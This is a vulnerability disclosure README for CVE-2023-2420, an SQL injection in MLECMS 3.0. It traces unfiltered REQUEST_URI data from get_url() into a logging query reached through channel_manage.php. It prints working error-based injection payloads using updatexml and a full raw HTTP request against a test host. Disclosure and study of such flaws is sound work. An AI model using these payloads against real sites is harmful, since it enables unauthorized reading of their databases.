Headline
CVE-2023-2420: elecms/README.md at main · VG00000/elecms
A vulnerability was found in MLECMS 3.0. It has been rated as critical. This issue affects the function get_url in the library /upload/inc/lib/admin of the file upload\inc\include\common.func.php. The manipulation of the argument $_SERVER[‘REQUEST_URI’] leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227717 was assigned to this vulnerability.
Source code download address: http://www.mlecms.com/download/zip/mlecms-3.0.zip Operating environment:Nginx+mysql
A vulnerability exists in the "get_url()" function in lines 40-53 of the “upload\inc\include\common.func.php” file,This function directly obtains the URL from “$_SERVER” and returns it without filtering, which may lead to SQL injection or XSS vulnerabilities
Global search for "get_url", where “get_url” exists in “/upload/inc/lib/admin.lib.php” and is directly spliced into SQL statements
Open this file, line 49. The risky SQL statement is located in the "logs ()" method
Continue to track the “logs” method, which is used on lines 13 and 16 of the " \upload\admin\channel_manage.php" file
Analyze the routing, combine the file name characteristics, and locate the function point at “网站频道管理”
Analyze" channel_manage. php “, and only execute” admin:: logs “when” $_GET ['del '] “is a number and” $ass [‘id’] “is empty.”
After analyzing and testing “$db ->query” to construct a request package, it is known that the deleted channel ID is greater than the actual channel ID, which can make “$ass ['id ']" null. Because” $_GET [‘del '] "must be a number, and the vulnerability point is located in the URL, requiring the insertion of characters. Therefore, combined with SQL statements, the following error injection method can be used to query the database name: channel_manage.php?del=1111#’or updatexml(1,concat(0x7e,database()),0) or’
Query user
The test environment is Nginx+MySQL. If other middleware is used, it may be necessary to reconstruct the payload data packet: GET /admin/channel_manage.php?del=1111#’or updatexml(1,concat(0x7e,user()),0) or’ HTTP/1.1 Host: 192.168.31.128:90 accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=1ohoqsk1aaiaj81sr1ngt5phm0; mlecms_global_language=1 Connection: close